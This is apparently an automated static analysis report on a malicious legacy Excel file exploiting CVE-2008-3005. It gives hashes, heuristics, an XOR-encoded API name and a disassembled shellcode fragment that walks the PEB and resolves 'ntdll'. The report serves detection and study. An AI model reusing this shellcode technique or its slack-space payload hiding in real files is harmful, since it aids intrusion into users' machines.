Malicious Office (OLE) / .RL — malware analysis report

Static analysis result for SHA-256 afe6b95ad95bc689…

MALICIOUS

Office (OLE) / .RL

84.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2026-06-21
MD5: 0e4e3c2d84a9bc726a50b3c91346fbb1 SHA-1: 52eb16966670b76f8728fda28c48bc6c49f20e07 SHA-256: afe6b95ad95bc689c356f34ec8d9094c495e4af57c932ac413b65ef132063acc
200 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The file is identified as malicious due to the critical heuristic firing for CVE-2008-3005, an Excel Index Array exploit. This indicates the file is designed to exploit this vulnerability for client-side execution. The presence of XOR-encoded strings and PEB access suggests further malicious activity, likely payload delivery, though no specific scripts or URLs were extracted to confirm.

Heuristics 4

  • Excel Index Array exploit — CVE-2008-3005 critical CVE likely CVE_2008_3005
    Legacy Excel workbook has the CVE-2008-3005 exploit shape: a compact BIFF8 FORMAT-index cluster paired with a normal XF table and a large unallocated OLE slack region used to stage the payload. The FORMAT pattern alone is not sufficient, so the rule requires the OLE slack payload-hiding context to keep false positives low.
  • XOR-encoded strings (key 0x97) critical SC_XOR_ENCODED
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x97: 'RegOpenKeyExA'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 89% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.984) — 3/3 branch targets land on an instruction boundary (100% coherence)
    000037A2  64a130000000      mov eax, dword ptr fs:[0x30]
000037A8  8b400c            mov eax, dword ptr [eax + 0xc]
000037AB  8b701c            mov esi, dword ptr [eax + 0x1c]
000037AE  ad                lodsd eax, dword ptr [esi]
000037AF  8b6808            mov ebp, dword ptr [eax + 8]
000037B2  8bf7              mov esi, edi
000037B4  6a0f              push 0xf
000037B6  59                pop ecx
000037B7  e8f6020000        call 0x3ab2
000037BC  e2f9              loop 0x37b7
000037BE  8bdf              mov ebx, edi
000037C0  81eb00010000      sub ebx, 0x100
000037C6  c7036e74646c      mov dword ptr [ebx], 0x6c64746e
000037CC  c743046c000000    mov dword ptr [ebx + 4], 0x6c
000037D3  53                push ebx
000037D4  8b06              mov eax, dword ptr [esi]
000037D6  e81c030000        call 0x3af7
000037DB  8be8              mov ebp, eax
000037DD  6a01              push 1
000037DF  59                pop ecx
000037E0  e8cd020000        call 0x3ab2
000037E5  e2f9              loop 0x37e0
000037E7  8bee              mov ebp, esi
000037E9  81ec00040000      sub esp, 0x400
000037EF  33c0              xor eax, eax
000037F1  894530            mov dword ptr [ebp + 0x30], eax
000037F4  8b7d5c            mov edi, dword ptr [ebp + 0x5c]
000037F7  83453004          add dword ptr [ebp + 0x30], 4
000037FB  6a00              push 0
000037FD  ff7530            push dword ptr [ebp + 0x30]
00003800  8b                .byte 0x8b
00003801  45                inc ebp
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 86,016 bytes but its declared streams total only 21,308 bytes — 64,708 bytes (75%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Open this report in the interactive analyzer, or submit your own file for analysis.